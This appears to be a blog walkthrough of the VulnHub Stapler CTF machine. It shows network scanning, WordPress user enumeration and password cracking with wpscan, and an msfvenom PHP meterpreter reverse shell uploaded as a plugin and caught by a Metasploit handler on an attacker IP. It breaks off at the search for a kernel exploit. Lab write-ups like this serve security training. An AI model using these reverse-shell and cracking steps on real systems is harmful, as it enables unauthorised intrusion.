Hacking Articles|Raj Chandel's Blog: Hack the Stapler VM (CTF Challenge)

In this article we will try to attack and gain root access to the Stapler: 1 challenge from VulnHub. The goal is to reconnaissance, enumeration, and exploits this vulnerable machine to get root access and to read the contents of flag.txt. We have been told that are various methods to do so but we have tried and found the simplest way.

Download the stapler vm from here

Penetrating Methodology:

· Network Scanning (Nmap, netdiscover)

· Enumeration (robot.txt)

· Wordpress scanning & password cracking (wpscan)

· Login into Wordpress

· Generate PHP Backdoor (Msfvenom)

· Upload and execute a backdoor

· Reverse connection (Metasploit)

· Import python one-liner for proper TTY shell

· Kernel privilege escalation

· Get Root access and capture the flag.

Start off with scanning the network to find our target. And we all the command for it is:

netdiscover

We found our target –> 192.168.1.126

To scan our target IP we will use aggressive scan (-A)

nmap -p- -A 192.168.1.126

Result will shows us that port number 21, 22, 53, 80, 137, 139, and so many other ports are open.

Also tell us about robot.txt 2 disallowed entries i.e. /admin112233 and /blogblog. Then we explored target IP over port 80 but didn’t found anything here.

So we tried opening it in browser with port 12380

We open /blogblog/ but here also didn’t find any clue for next step.

Then we thought to explore https://192.168.1.126:12380/blogblog/ which put up a new web page as shown below. Studying this blog we have established that the blog is made of Word Press. Now obviously use WPScan to know all about the blog.

To apply wpscan we have come up with a 3-in-1 command as it will tell us all about the theme and plug-ins as well as usernames and the command is:

wpscan –url https://192.168.1.126/blogblog/ --enumerate at--enumerate ap --enumerate u --disable-tls-checks

It has dumped all username for login, now we only need password for login into wordpress.

By executing below command you will get password for John.

wpscan -u https://192.168.1.126/blogblog/ --username John --wordlist /usr/share/wordlists/rockyou.txt

As you can see the password is “incorrect” for user “john”; now use these credential for login into wordpress.

As we logged in, all now we have to do is to create our PHP code to upload so that once the code will execute we will have its session. To generate the code type:

msfvenom -p php/meterpreter/reverse_tecp lhost-192.168.1.132 lport=4444 -f raw

On other hand run multi/handler inside Metasploit framework.

Copy the code from to die() and save it in a file with .php extension.

Now, as we already logged on, go to plugins option then select add plugin option. Click on browse option and select the PHP in which you have just saved the code and click on OK.

Now go to the upload directory and double click on the shell.php which you just uploaded.

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 192.168.1.132

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session 1. But task is not finished yet, still we need to penetrate more for privilege escalation. Further type:

sysinfo

Then to access proper TTY shell we had import python one line script by typing following:

Shell

python -c 'import pty;pty.spawn("/bin/bash")'

lsb_rlease -a

We now know that our target is using Ubuntu 16.04 so we will try and search its exploit on exploit-db.com. Our search is successful and we have found our appropriate exploit as shown below: